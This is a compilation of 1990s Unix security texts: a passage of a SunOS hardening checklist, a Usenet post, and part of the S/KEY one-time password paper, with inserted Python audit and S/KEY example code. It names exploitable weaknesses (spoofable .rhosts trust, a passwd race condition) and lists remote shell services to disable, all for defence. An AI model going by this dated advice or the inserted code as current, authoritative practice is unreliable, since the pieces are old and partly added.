options "IPFORWARDING=-1"
For info on how to custom configure a kernel, see the file
/usr/sys/`arch`/conf/README.


Kernel changes ——-

+ modify ruserok() in /usr/lib/libc.so.1.8 (9 on 4.1.3 U1) to disable:
– root .rhosts authentication, wildcards in .rhosts, or
.rhosts entirely depending on the level of security you want.
Why:
ruserok() is a library routine that does the checking of both the
.rhosts and /etc/hosts.equiv files for all the r commands.
a) ruserok() uses the source IP address in the rpc request for
authentication. There are no guarantees that this address is correct.
This address can easily be spoofed, yielding illegitimate access to
a system.
b) Crackers will often insert +’s into users’ .rhosts file
to allow them to gain access at a later date. Most users
don’t look at their .rhosts file too often.
Note: While using .rhosts prevents crackers from sniffing your users’
passwords, it also makes them vulnerable to IP spoofing (claiming
to be a host that you’re not); it becomes a matter of preference
what level of protection you’d choose here.

How:
To modify the source code requires a source code license.
At Univ of Hawaii, a modified version of libc.so.1.8 should be
available through the systems group.

For those who wish to create their own modified version of ruserok()
please see the section at the end that describes some of the details
for creating a custom libc.so.

Additionally the logdaemon package Ref. 15 has a modified version
of libc.so that helps with this. This site also has BSD sources
for the ruserok() routine.

Finally TCP wrappers can also be used to restrict access to each
individual r command. Ref. 4

More info: ruserok(3), hosts.equiv(5),
source code file /lib/libc/net/rcmd.c, Ref. 4, Ref. 15

Filesystem change———-

+ create the file /etc/ftpusers
Why:
This file is a list of users that will not be allowed to access the
system via ftp. This prevents Joe Cracker from using ftp to
modify a file (such as /etc/passwd) if he is able to determine your
root password.
How:
Create the file /etc/ftpusers with the following entries (one per line):
root, nobody, daemon, sys, bin, uucp, news, ingres, AUpwdauthd,
AUyppasswdd, sysdiag, sundiag, and any other ID’s that exist that
you don’t want to allow ftp access.

More info: man ftpusers(5)

+ Remove the + in /etc/hosts.equiv
Why:
Well….. Everyone gains access with this.
Note: This file should not have any comment lines.
More info: hosts.equiv(5)

+ edit /etc/exports remove all entries you don’t want exported.
– ensure whatever entries remain have restricted access
Why:
NFS leaves the normal file system protection up to the client
instead of the server. A cracker with root access on a client can
work around many of these protections. As a result filesystems
exported to the world are particularly vulnerable.
How:
Edit the file /etc/exports
1) Only export what you need to export. If you aren’t certain that
it needs to be exported, then it probably doesn’t.
2) Never export to the world. Use a -access=host.foo.bar.edu option.
3) Whenever possible export the file systems read-only (option ro).
You can use showmount -e to see what you currently have exported.

More info: exports(5), exportfs(8), showmount(8)

+ Install random number inode generator on filesystems fsirand
Why:
Predictable root handles assist crackers in abusing NFS. After
installing the patch for fsirand you’ll need to run fsirand for
all your filesystems.
How:
Ensure the filesystem is unmounted and run fsirand.
More info: fsirand(8), SunOS patch 100173 (NFS Jumbo)

+ nosuid in mounts
Why:
Use the nosuid option when adding entries to /etc/fstab to mount a
filesystem exported by another host. Anyone gaining access to the
other host can create or modify an existing program which could
compromise your system. Note: this doesn’t work on tmpfs filesystems.
How:
Include the nosuid when you add an entry to /etc/fstab to import
a filesystem.
More info: Ref. 3 [Stern 92] pg. 175 fstab(5)

+ Edit /etc/ttytab to remove the secure option from all entries.
Why:
The secure entry in /etc/ttytab allows logins directly to root on that
tty. If you feel that your machine is not in a physically secure
location, you may choose to remove the secure option from the
console as well.
More info: ttytab(5)

+ Set eeprom secure field to command or full –
Why:
If you feel that your machine is not in a secure location, then
the eeprom field secure can be used to prevent unauthorized root
access by crashing your machine. Note: with the full option the
system will not auto-reboot and will wait for the root password to
be entered.
More info: eeprom(8)

+ chmod 600 /dev/eeprom –
Why:
Prevents users from reading the eeprom passwd.
More info: eeprom(8)

+ Remove openprom support if you do not intend to use the eeprom
secure field.
Why:
A cracker who gains root access could install an eeprom password and
make your life a bit harder.
How:
Remove the device driver from the kernel by commenting out
the following:

# The “open EEPROM” pseudo-device is required to support the
# eeprom command.
#
pseudo-device openeepr # onboard configuration NVRAM
More info: eeprom(8)

+ Uncomment security options in frame buffer table file /etc/fbtab
Why:
Without these entries ownership of console devices will not be properly
set.
More info: fbtab(5)

+ add umask 022 to /etc/rc & /.login
Why:
Prevent key files created during startup and root operation from
being created world writeable. Note you may want to set umask in
/.login to 077 instead of 022
More info: umask(1), rc(8)

+ chmod go-w /etc/* ; chmod g+w /etc/dumpdates
Why:
None of these files in /etc should require write access
by world except for dumpdates, which requires group write access.
More info: chmod(1), aliases(5), state(5), utmp(5V), remote(5), rmtab(5)

+ edit /etc/rc.local to comment change part that chmod’s 666 motd
Why:
/etc/motd is the normal system’s message of the day; it won’t
allow people to gain root access, but it could be a nuisance if they
can change this anonymously. Additionally it is important to
ensure that the line “rm -f /tmp/t1” is at the beginning of this part.

+ Chmod u-s the following files unless you specifically use them:
Why:
Changing the modes for those files which you will not be using
helps prevent would-be crackers from exploiting unknown security
flaws in these files which could be used to compromise your system.

/usr/bin/cu             /usr/bin/tip            /usr/bin/fusage
/usr/bin/nsquery        /usr/bin/uucp           /usr/bin/uuname
/usr/bin/uustat         /usr/bin/uux            /usr/ucb/rcp
/usr/ucb/rdist          /usr/ucb/rlogin         /usr/lib/uucp/uusched
/usr/lib/uucp/uuxqt     /usr/ucb/rsh            /usr/lib/uucp/uucico
/usr/games/hack         /usr/games/chesstool    /usr/games/fortune
/usr/lib/exrecover      /usr/games/robots       /usr/lib/uucp/remote.unknown
/usr/games/hack         /usr/games/snake        /usr/bin/sunview1/sv_release
/usr/etc/rfsetup
/usr/bin/allocate – used with C2 security.
/usr/ucb/quota – used with disk quotas
/usr/lib/expreserve – used to recover edit session that died.

Following may only be needed to be run by user root; as such, they would
not need to be SUID root:
/usr/etc/shutdown /usr/lib/acct/accton

More info: lots of man pages 😉

+ chmod g-s the following files unless you specifically use them:
Why:
Changing the modes for those files which you will not be using helps
prevent would-be crackers from exploiting unknown security flaws
in these files which could be used to compromise your system.

/usr/bin/wall           /usr/etc/trpt           /usr/bin/sunview1/toolplaces
/usr/bin/iostat         /usr/bin/ipcs           /usr/ucb/vmstat
/usr/ucb/netstat        /usr/etc/arp            /usr/etc/dmesg
/usr/etc/dkinfo         /usr/etc/chill          /usr/etc/dumpfs
/usr/etc/devinfo        /usr/etc/nfsstat        /usr/old/perfmon
/openwin/bin/xload      /usr/kvm/pstat          /usr/kvm/crash
/usr/kvm/getcons        /usr/etc/kgmon          /usr/etc/trpt

More info: lots of man pages 😉

+ edit syslog.conf — uncomment auth & mail lines
Why:
This enables improved logging of logins and su’s; be prepared for lots of
data.
More info: syslog.conf(5)

+ chmod 640 /vmunix; chgrp kmem /vmunix ;
Why:
Prevent crackers from finding out more about your kernel configuration.


Changes to ID management ——

+ Disable SUID passwd (if using NIS) or -F option in /bin/passwd
Why:
Here two options exist:
1) you are using NIS for your user database; so you don’t need
/bin/passwd (and the two hard links to it /bin/chfn & /bin/chsh)
to be SUID root.
2) You will have local entries in your /etc/passwd that you would
like to be able to change their own passwd. Then please note that
/bin/passwd has a race condition that can be exploited to write to
files as root, allowing a cracker to gain root access.

In either case yppasswd (and ypchfn & ypchsh) does not need to
be SUID root.
How:
In all cases – cd /bin; chmod u-s yppasswd ypchfn ypchsh
Option 1 – cd /bin; chmod u-s passwd chfn chsh
Option 2a – Replace passwd with a proactive (check for bad passwds)
passwd program. Ref 7.
Option 2b – Do a binary edit of passwd (sun’s code) as shown below:
# cd /bin
# cp passwd passwd.old; chmod 700 passwd.old
# adb -w - passwd
not core file = passwd
/l 'F:'
0x68de This address is required in the following step:
0x68de/w 0
0x68de: 0x463a = 0x0

# chmod 4711 /bin/passwd
Note: The following files should all contain the same code, and
be SUID root (unless chmod u-s was done above). If you intend
to use any of these, ensure they are a link to the modified
file /bin/passwd: yppasswd, ypchfn, ypchsh, chfn, chsh.
More info: Ref. 6 [8lgm]-Advisory-7.UNIX.passwd.11-May-1994.NEWFIX

+ remove ID sync:::
Why:
This ID is created to enable the admin to sync the file system before a
system crash. It defaults without any password, and can be abused to
gain access to the system. The simplest solution is to live without
this feature and remove this ID.
More info: passwd(5)

+ Implement shadowing
Why:
To restrict access to all users’ encrypted passwords. Even though
passwords are encrypted, Crack (a publicly available program) can
be used to effectively guess users’ passwords.
How:
This can be done two different ways:
1. by implementing Sun’s C2 security package, which
provides additional auditing. I’ve found that this auditing can be
troublesome to maintain and I didn’t have need for the extensive data.
2. the second option is to implement shadowing but not C2, this
procedure is fully explained in detail in Ref. 5. In short:
– ensure patch 100564 is installed, (note this also implements
securenets for NIS)
– split /etc/passwd into /etc/passwd & /etc/security/passwd.adjunct
– split /etc/group into /etc/group & /etc/security/group.adjunct
– add required Audit users (even if not implementing auditing)
– comment out the part of rc.local that starts audit
– reboot.
The existence of the file /etc/security/passwd.adjunct has several
other effects in rc.local that improve system security; (ypbind -s
and rpc.mountd without -n).
More info: Ref 5

+ ensure all ID’s have passwd
Why:
Any ID without a password provides open access to your system,
Root comes without a password.
More info: passwd(5)

Modify mail system —–
Why:
The sendmail program itself has been notorious for numerous bugs that
gave crackers root access illegitimately. This is a huge topic and
should be a paper or book in itself. I claim no expertise here, and
to my great fortune my sendmail experience is limited. 😉
There are several different possible configurations and options
I’ll outline them and point you to further References.

Host configuration:
1. If you intend to send and receive mail directly on your machine.
Options are:
a. Live with sendmail – install the newest version 8.6.9 (currently)
– ensure a mail file is always in existence for all users
Ref.10 &11.
– “chmod u-s /bin/mail” and change sendmail to use “procmail”
or mail.local Ref. 17
Ref.where to get???
– change sendmail default UID in sendmail.cf to 65534 “Ou65534”
– turn on security features of sendmail:
“Opauthwarnings needmailhelo noexpn novrfy restrictmailq”
Refs. 2 [Cheswick & Bellovin 94] & 9 [Costales 93]

b. Install zmailer — Ref 8 [URL to zmailer package]
– zmailer does not use /bin/mail so chmod u-s /bin/mail

2. If mail for your host is received on a different host (ie. local mail
delivery is handled by another host). Here your system should only
need to support outgoing mail. To prevent the sendmail daemon from
being started comment out the part of /etc/rc.local that starts
sendmail. For outgoing mail:
a. install latest version of sendmail.
– see config 1 for things to change in sendmail config.
– since mail delivery is being handled by main mail host
there is no need for /bin/mail so – chmod u-s /bin/mail
b. Install zmailer — Ref 8 [URL to zmailer package]
– zmailer does not use /bin/mail so chmod u-s /bin/mail

3. No need for mail whatsoever on this machine
(incoming, outgoing, or internal).
This is certainly most secure mode because e-mail will not be able to
be sent from or to this machine. This basic restriction of outside
access will prevent abuse of that access.
How:
To disable mail totally:
– chmod u-s /usr/lib/sendmail & /usr/lib/sendmail.mx & /bin/mail
– comment out the part of rc.local that starts sendmail

Packages to enable better monitoring and security:
————————

+ tripwire – Ref.13.
– Include all suid & sgid files in config.
– I’ve modified COPS script to check this with every run, awaiting
response from Dan Farmer if he minds my releasing script.
+ tcp wrappers – Ref.4.
+ Cops – Ref. 14
– Set up to run each night – be careful to check the
bitbucket output to ensure that it is working properly.
+ Modified portmapper, login, rshd, rlogind, pidentd from W. Venema
Ref. 15
+ TAMU tiger scripts – Ref. 16.

Note: the Australian group SERT has put together a package called
MegaPatch that includes several of these packages as well as many
of the patches to SunOS previously mentioned. Ref. 18

References
———-

[1] Dan Farmer & Wietse Venema, “Improving the security of your Site by
Breaking Into it”, 1993.
URL:ftp.win.tue.nl:/pub/security/admin-guide-to-cracking.Z

[2] W. Cheswick & S. Bellovin, “Firewalls and Internet Security,” Addison-
Wesley, April 94.

[3] H. Stern, “Managing NFS & NIS”, O’Reilly & Associates, April 92

[4] Wietse Venema, “TCP WRAPPER: Network monitoring, access control and
booby traps,” Proceedings of the Third Usenix Unix Security Symposium,
pg 85-92.
URL:ftp.win.tue.nl:/pub/security/tcp_wrapper.ps.Z (paper – .txt.Z avail)
URL:ftp.win.tue.nl:/pub/security/tcp_wrappers_6.3.shar.Z (package)

[5] Eric Oliver, “How to shadow without C2 Auditing”, June 94
URL:ftp.Hawaii.Edu:/????????

[6] [8lgm]-Advisory-7.UNIX.passwd.11-May-1994.NEWFIX

[7] Proactive password changing programs
(There are several; this is the only one whose URL I had available)
URL:info.mcs.anl.gov:/pub/systems/anlpasswd-2.2.tar.Z

[8] Zmailer package –
URL: cs.toronto.edu:/pub/zmailer.tar.Z
/pub/zmailer.README

[9] Bryan Costales, Eric Allman & Neil Rickert, “Sendmail,”
O’Reilly & Associates, June 93

8lgm advisories are available through the 8lgm file server –
8lgm-fileserver@bagpuss.demon.co.uk
[10] [8lgm]-Advisory-5.UNIX.mail.24-Jan-1992
[11] [8lgm]-Advisory-5.UNIX.mail.24-Jan-1992.PATCH
[12] [8lgm]-Advisory-6.UNIX.mail2.2-May-1994

[13] Tripwire – Gene Kim & Gene Spafford 1994
URL:ftp.cs.purdue.edu:/pub/spaf/COAST/Tripwire

[14] Cops – Dan Farmer & Gene Spafford 1990
URL:ftp.cert.org:/pub/tools/cops

[15] portmapper, login, rshd, rlogind – Wietse Venema
URL:ftp.win.tue.nl:/pub/security/portmap.shar.Z
URL:ftp.win.tue.nl:/pub/security/logdaemon-XX.tar.Z

[16] TAMU tiger script. – Safford et al 93
URL:net.tamu.edu/pub/security/TAMU

[17] Local mail delivery agents:
URL:ftp.informatik.rwth-aachen.de:/pub/packages/procmail
URL:ftp —- ????? mail.local Joerg Czeranski

[18] MegaPatch – SERT
URL:ftp.sert.edu.au:/security/sert/tools/MegaPatch.1.7.tar.Z

[19] Source Routing Patch –
URL:ftp.greatcircle.com:/pub/firewalls/digest/v03.n153.Z

Acknowledgements:
Thanks to all the people in comp.security.unix who offered their
suggestions, and thanks to the following people for their kind review:
casper@fwi.uva.nl (Casper Dik)
baron@uhunix.uhcc.Hawaii.Edu (Baron K Fujimoto)
rgoodman@uhunix.uhcc.Hawaii.Edu (Becky Goodman)
newsham@uhunix.uhcc.Hawaii.Edu (Tim Newsham)
andys@unipalm.co.uk (Andy Smith)

—— Other Thoughts for future development & other —
Didn’t have enough time to do these as well as I’d like.

+ disable routed (standard routing table)
Prevents receiving a false routing table.

+ remove /dev/nit?

+ Customizing ruserok() – a bit beyond the basics but here’s some info:
If you have source license to 4.1.3 modify the routine
ruserok() to return -1 for the cases you wish to disallow.
To disable .rhosts authentication entirely, simply have this routine
return -1. Look at the file /usr/lib/shlib.etc/README for how to modify
libc.so, note: also make the following changes:
in the file /usr/lib/shlib.etc/README below the line
% mv rpc_commondata. rpc_commondata.o
insert
% mv xccs.multibyte. xccs.multibyte.o
in the Makefile:
change the lines below to read as they do here:
OBJSORT=/usr/lib/shlib.etc/objsort
AWKFILE=/usr/lib/shlib.etc/awkfile
and add the -ldl option at the end of both ld command lines.

More info: ruserok(3), hosts.equiv(5)
source code file /lib/libc/net/rcmd.c Ref. 4, Ref. 15


tmk

———————————————————————–
Tom M. Kroeger Pray for wind
University of Hawaii Computing Center \ Pray for waves and
2565 The Mall, Keller Hall |\ Pray it’s your day off!
Honolulu HI 96822 (808) 956-2408 |~\
e-mail: tmk@uhunix.uhcc.hawaii.edu |__\
,—-+–
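
Added example (not part of the original post or of any SunOS tool): a small Python audit of the checklist's /etc/inetd.conf, /etc/hosts.equiv and /etc/exports steps. The sample file contents are constructed, the function names are hypothetical, and the exports parsing assumes the SunOS "directory -option,option" layout.

```python
# Added example: audits constructed copies of three files the checklist edits.

# Service groups exactly as the checklist lists them for /etc/inetd.conf.
AGAINST = {"shell", "tftp"}
UNNECESSARY = {"name", "comsat", "login", "uucp", "exec"}
POSSIBLY_NEEDED = {"ftp", "telnet", "finger", "talk"}


def active_lines(text):
    """Yield non-blank lines that are not commented out with '#'."""
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#"):
            yield line


def audit_inetd(text):
    """Map each enabled inetd service to the checklist's advice for it."""
    verdicts = {}
    for line in active_lines(text):
        # First field is the service; RPC entries look like "rstatd/2-4".
        service = line.split()[0].split("/")[0]
        if service in AGAINST:
            verdicts[service] = "disable"
        elif service in UNNECESSARY:
            verdicts[service] = "probably unnecessary"
        elif service in POSSIBLY_NEEDED:
            verdicts[service] = "keep only if needed"
        else:
            verdicts[service] = "not in checklist: review"
    return verdicts


def audit_hosts_equiv(text):
    """Flag a bare '+' (everyone is trusted) and comment lines (not allowed)."""
    problems = []
    for number, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if line.split()[:1] == ["+"]:
            problems.append((number, "wildcard +"))
        elif line.startswith("#"):
            problems.append((number, "comment line"))
    return problems


def audit_exports(text):
    """Return {directory: [problems]} for entries breaking the export rules."""
    report = {}
    for line in active_lines(text):
        fields = line.split()
        options = []
        if len(fields) > 1 and fields[1].startswith("-"):
            options = fields[1][1:].split(",")
        names = {opt.split("=")[0] for opt in options}
        problems = []
        if "access" not in names:      # rule 2: never export to the world
            problems.append("exported to the world")
        if "ro" not in names:          # rule 3: read-only whenever possible
            problems.append("not read-only")
        if problems:
            report[fields[0]] = problems
    return report


# Constructed sample inputs (not taken from any real host).
SAMPLE_INETD = """\
ftp     stream  tcp  nowait  root  /usr/etc/in.ftpd     in.ftpd
#telnet stream  tcp  nowait  root  /usr/etc/in.telnetd  in.telnetd
shell   stream  tcp  nowait  root  /usr/etc/in.rshd     in.rshd
login   stream  tcp  nowait  root  /usr/etc/in.rlogind  in.rlogind
tftp    dgram   udp  wait    root  /usr/etc/in.tftpd    in.tftpd -s /tftpboot
rstatd/2-4  dgram  rpc/udp  wait  root  /usr/etc/rpc.rstatd  rpc.rstatd
"""
SAMPLE_HOSTS_EQUIV = "# trusted hosts\nhost.foo.bar.edu\n+\n"
SAMPLE_EXPORTS = """\
/usr/local  -access=host.foo.bar.edu,ro
/home       -access=host.foo.bar.edu
/export
"""

if __name__ == "__main__":
    for service, verdict in audit_inetd(SAMPLE_INETD).items():
        print("inetd.conf:", service, "->", verdict)
    for number, problem in audit_hosts_equiv(SAMPLE_HOSTS_EQUIV):
        print("hosts.equiv line", number, "->", problem)
    for directory, problems in audit_exports(SAMPLE_EXPORTS).items():
        print("exports:", directory, "->", ", ".join(problems))
```
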

From shamel@mais.hydro.qc.ca Thu Jun 30 10:46:57 EDT 1994
Article: 35173 of comp.sys.sun.admin
Newsgroups: comp.sys.sun.admin,comp.sys.sun.apps,comp.sys.sun.wanted
Path: babbage.ece.uc.edu!news.kei.com!uhog.mit.edu!europa.eng.gtefsd.com!howland.reston.ans.net!spool.mu.edu!torn!utnut!utcsri!newsflash.concordia.ca!sifon!clouso.crim.ca!hobbit.ireq.hydro.qc.ca!shamel
From: shamel@mais.hydro.qc.ca (Stephane Hamel)
Subject: Re: System Administration Tools
Message-ID: <Cs7n2I.CI4@ireq.hydro.qc.ca>
Followup-To: comp.sys.sun.admin,comp.sys.sun.apps,comp.sys.sun.wanted
Sender: news@ireq.hydro.qc.ca (Netnews Admin)
Organization: Hydro-Quebec, Montreal, Canada
X-Newsreader: TIN [version 1.2 PL2]
References:
Date: Thu, 30 Jun 1994 12:37:30 GMT
Lines: 27
Xref: babbage.ece.uc.edu comp.sys.sun.admin:35173 comp.sys.sun.apps:8372 comp.sys.sun.wanted:5799

Since this topic often comes around, I’ll make my draft copy of an extensive
document I am writing available for ftp (in PostScript format).

Be warned that it is still at an early stage, and probably contains lots of
bad English formulations (my mother language is French…).

But still, there is some valuable piece of information. And of course, I am
open to all comments, suggestions and extensions to the information contained
there.

The document is entitled “Management and monitoring tools in a distributed
heterogeneous client-server environment” available for ftp on
colt.mais.hydro.qc.ca (131.195.163.41) under /incoming/manmon.ps

\\\|///
\\ ~ ~ //
(/ @ @ /)
+————oOOo-(_)-oOOo———-+
| Stephane Hamel |
| Technical Advisor/System Admin. |
| Hydro-Quebec/TDSB |
| 680 Sherbrooke West, 2nd floor |
| Montreal, Qc (CANADA) H3C 4T8 |
| Phone : (514) 289-7916 |
| Fax : (514) 289-7926 |
| e-mail: shamel@mais.hydro.qc.ca |
+———————————–+

Description of the S/KEY One-Time Password System by Neil M. Haller and Philip R. Karn

Description of The S/KEY One-Time Password System

Neil M. Haller nmh@thumper.bellcore.com
Philip R. Karn karn@chicago.qualcomm.com

ABSTRACT

The S/KEY one-time password system provides authentication over networks
that are subject to eavesdropping/replay attacks. This system has several
advantages compared with other one-time or multi-use authentication
systems. The user’s secret password never crosses the network during
login, or when executing other commands requiring authentication such as
the UNIX passwd or su commands. No secret information is stored anywhere,
including the host being protected, and the underlying algorithm may be
(and in fact, is) public knowledge. The remote end of this system can run
on any locally available computer. The host end could be integrated into
any application requiring authentication.

Trademarks
———-
Athena and Kerberos are trademarks of MIT.
S/KEY is a trademark of Bellcore.
SPX and DEC are trademarks of Digital Equipment Company.
UNIX is a registered trademark of UNIX System Laboratories, Inc.

Attributes of the S/KEY One-Time Password System
————————————————

The S/KEY authentication system is a simple scheme that protects user
passwords against passive attacks. It is not as powerful or general in
scope as Kerberos or SDASS; nor does it protect against active attacks.
It can, however, be easily and quickly added to almost any UNIX system
without requiring any additional hardware and without requiring the
system to store information (such as plain text passwords) that would
be more sensitive than the encrypted passwords already stored. The
S/KEY system can be used with non programmable terminals or personal
computers (e.g., systems running DOS or Apple Macintoshes) with
conventional communications programs.

Some of the properties of the S/KEY system are:

o Eavesdropping protection

o Conceptually simple and easy to use

o Based on a memorized secret password; does not require a
special device although it can easily be adapted to do so.

o Can be automated for authentication from a trusted system.
(Can also be partially automated for fast operation.)

o No secret algorithms.

o No secrets stored on host.

Description of the S/KEY One-Time Password System
————————————————-

There are two sides to the operation of our one-time password system.
On the user (or client) side, the appropriate one-time password must
be generated. On the system (server) side, the one-time password must
be verified. One time passwords are generated and verified using a
one-way function based on MD4 [Rivest]. (Conversion to MD5 would be
trivial)

We have defined our one-way function to take 8 bytes of input and to
produce 8 bytes of output. This is done by running the 8 bytes of
input through MD4 and then “folding” pairs of bytes in the 16-byte MD4
output down to 8 bytes with exclusive-OR operations. This allows us to
apply the one-way function an arbitrary number of times.

Generation of One-Time Passwords

The sequence of one-time passwords is produced by applying the one-way
function multiple times. That is, the first one-time password is
produced by running the user’s secret password (s) through the one-way
function some specified number of times, (n). Assuming n=4,

p(1) = f(f(f(f(s))))

The next one-time password is generated by running the user’s password
through the one-way function only n-1 times.

p(2) = f(f(f(s)))

An eavesdropper who has monitored the use of the one-time password
p(i) will not be able to generate the next one in the sequence p(i+1)
because doing so would require inverting the one-way function. Without
knowing the secret key that was the starting point of the function
iterations, this cannot be done.

Seeding the Password

A user might want to use the same secret password on several machines,
or might allow the iteration count to go to zero. An initial step
concatenates a seed with the arbitrary length secret password, crunches
the result with MD4, and folds the result to 64 bits. The result of
this process is then iterated n times.

System Verification of Passwords

The host computer first saves a copy of the one-time password it
receives, then it applies the one-way function to it. If the result
does not match the copy stored in the system’s password file, then the
request fails. If they match, then the user’s entry in the system
password file is updated with the copy of the one-time password that
was saved before the final execution (by the server) of the one-way
function. This updating advances the password sequence.

Because the number of one-way function iterations executed by the user
decreases by one each time, at some point the user must reinitialize the
system or be unable to log in again. This is done by executing a
special version of the passwd command to start a new sequence of
one-time passwords. This operation is essentially identical to a
normal authentication, except that the one-time password received
over the network is not checked against the entry already in the
password file before it replaces it. In this way, the selection of a
new password can be done safely even in the presence of an eavesdropper.
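
Added example, not code from the paper or from the S/KEY distribution: a Python sketch of the generation, seeding and verification steps described above. It swaps MD5 for MD4 (the conversion the paper calls trivial) because current Python builds often lack MD4; the fold pairing (byte i with byte i+8), the seed-then-secret concatenation order, the Host class and the secret used in the demo are assumptions.

```python
import hashlib
import hmac


def fold(digest):
    """Fold a 16-byte digest down to 8 bytes with exclusive-OR.
    Assumed pairing: byte i is XORed with byte i+8."""
    return bytes(a ^ b for a, b in zip(digest[:8], digest[8:]))


def f(block):
    """The one-way function: 8 bytes in, 8 bytes out (MD5 swapped in for MD4)."""
    if len(block) != 8:
        raise ValueError("the one-way function takes exactly 8 bytes")
    return fold(hashlib.md5(block).digest())


def otp(seed, secret, count):
    """One-time password number `count`: seed and secret are concatenated,
    crunched and folded to 64 bits, then run through f `count` times."""
    value = fold(hashlib.md5((seed + secret).encode()).digest())
    for _ in range(count):
        value = f(value)
    return value


class Host:
    """Server side: keeps only the last accepted one-time password per user."""

    def __init__(self):
        self.table = {}

    def initialize(self, login, seed, count, password):
        """The special passwd step: the new value replaces the entry unchecked."""
        self.table[login] = {"seed": seed, "count": count, "stored": password}

    def challenge(self, login):
        """Return (sequence number expected, seed), or None once the sequence
        is used up and the user has to reinitialize."""
        entry = self.table[login]
        if entry["count"] == 0:
            return None
        return entry["count"] - 1, entry["seed"]

    def verify(self, login, candidate):
        """Apply f once to the received password and compare with the stored
        copy; on a match, store the received password to advance the sequence."""
        entry = self.table[login]
        if entry["count"] == 0 or len(candidate) != 8:
            return False
        if not hmac.compare_digest(f(candidate), entry["stored"]):
            return False
        entry["stored"] = candidate
        entry["count"] -= 1
        return True


if __name__ == "__main__":
    secret = "constructed example secret"      # constructed, known only to Sue
    host = Host()
    host.initialize("sue", "unix3", 55, otp("unix3", secret, 55))
    number, seed = host.challenge("sue")        # (54, "unix3")
    password = otp(seed, secret, number)
    print("challenge:", number, seed)
    print("first login accepted:", host.verify("sue", password))
    print("replayed password accepted:", host.verify("sue", password))
    print("next challenge:", host.challenge("sue"))
```
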

Operation of S/KEY One-Time Password System
——————————————-

Overview

The S/KEY one-time password authentication system uses computation to
generate a finite sequence of single-use passwords from a single secret.
The security is entirely based on a single secret that is known only to
the user. Alternatively, part of or the entire secret can be stored in a
non-retrievable way, in the computing device.

Generation of S/KEY One-Time Passwords

As mentioned above, the one-time password sequence is derived from the
secret password using a computer. The required computation has been
executed on a variety of PC and UNIX class machines including notebooks
and palm-tops. A vendor has estimated that credit card size devices
could be built for less than $30 in large quantities.

The program can also be stored on and executed from a standard floppy
disk. This would allow operation on a remote computer that could not be
entirely trusted not to contain a Trojan Horse that would attempt
to capture the secret password. It is sometimes useful to pre-compute
and print several one-time passwords. These could be carried on a trip
where public terminals or workstations were available, but no trusted
local computation was available.

Description of Operation

The following narrative describes the procedure for logging into a UNIX
system using the S/KEY one-time password system. To illustrate the
most complex case, we assume a hand-held PC compatible computer is used.

o The user, call her Sue, identifies herself to the system by login name.

o The system issues a challenge including the sequence number of the
one-time password expected and a “seed” that is unique to the system.
This “seed” allows Sue to securely use a single secret for several
machines. Here the seed is “unix3” and the sequence number is 54.

o Sue enters 54 and unix3 into her palm-top computer. She is prompted
for her secret password.

o Sue enters her secret password that may be of any length. The palm-top
computes the 54th one-time password and displays it.

o Sue enters the one-time password and is authenticated.

o Next time Sue wants access, she will be prompted for one-time
password sequence number 53.
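
The seeding step, the iterated one-way function and the host-side check described above, carried through Sue's login, as an added example (not code from the S/KEY authors). A pure-Python MD4 is included because many current hashlib builds no longer provide it; the seed-then-secret byte order, the XOR fold of the digest's two halves, the function and class names and the sample secret are assumptions.

```python
"""S/KEY-style chain: seed + secret -> MD4 -> fold to 64 bits -> iterate."""
import hmac
import struct

_MASK = 0xFFFFFFFF
_ROUND3_ORDER = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 as specified in RFC 1320."""
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = (data + b"\x80" + b"\x00" * ((55 - len(data)) % 64)
           + struct.pack("<Q", 8 * len(data)))
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(48):
            if i < 16:      # round 1: selection function, words in order
                f, k, s, add = (b & c) | (~b & d), i, (3, 7, 11, 19)[i % 4], 0
            elif i < 32:    # round 2: majority function, column order
                f = (b & c) | (b & d) | (c & d)
                k, s = (i % 4) * 4 + (i - 16) // 4, (3, 5, 9, 13)[i % 4]
                add = 0x5A827999
            else:           # round 3: parity function, bit-reversed order
                f = b ^ c ^ d
                k, s = _ROUND3_ORDER[i - 32], (3, 9, 11, 15)[i % 4]
                add = 0x6ED9EBA1
            a, b, c, d = d, _rotl((a + f + x[k] + add) & _MASK, s), b, c
        state = [(v + w) & _MASK for v, w in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def one_way(block: bytes) -> bytes:
    """The one-way function: MD4 folded from 128 to 64 bits.
    Assumption: the fold is the XOR of the digest's two 8-byte halves."""
    digest = md4(block)
    return bytes(p ^ q for p, q in zip(digest[:8], digest[8:]))


def one_time_password(seed: str, secret: str, n: int) -> bytes:
    """Initial step on seed + secret (assumed order), then n iterations."""
    value = one_way(seed.encode() + secret.encode())
    for _ in range(n):
        value = one_way(value)
    return value


class SKeyHost:
    """Host side: stores the last accepted password, never the secret."""

    def __init__(self):
        self.entries = {}  # login -> [seed, stored sequence number, stored value]

    def initialize(self, login, seed, n, otp):
        # Models the special passwd run: the value is stored without a check.
        self.entries[login] = [seed, n, otp]

    def challenge(self, login):
        seed, n, _ = self.entries[login]
        if n == 0:
            raise RuntimeError("sequence exhausted: user must reinitialize")
        return n - 1, seed

    def login(self, login, received: bytes) -> bool:
        entry = self.entries[login]
        if entry[1] == 0:
            return False
        saved = received                          # copy kept before hashing
        if not hmac.compare_digest(one_way(saved), entry[2]):
            return False                          # no match: the request fails
        entry[1], entry[2] = entry[1] - 1, saved  # advance the sequence
        return True


def demo():
    secret = "constructed example passphrase"     # sample value, not from the page
    host = SKeyHost()
    host.initialize("sue", "unix3", 55, one_time_password("unix3", secret, 55))
    n, seed = host.challenge("sue")               # the challenge Sue sees
    otp = one_time_password(seed, secret, n)      # what her palm-top computes
    first = host.login("sue", otp)                # accepted, sequence advances
    replay = host.login("sue", otp)               # an eavesdropped copy fails
    return n, first, replay, host.challenge("sue")[0]


if __name__ == "__main__":
    print(demo())
```

The host never needs the secret: it only checks that hashing the received value once reproduces what it stored, which is why a captured password is useless for the next login.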

Semi-Automated Operation

The complexity illustrated above is necessary only when using a terminal
that is not programmable by the user, or when using a non-trusted
terminal. We have built semi-automatic interfaces for clients using
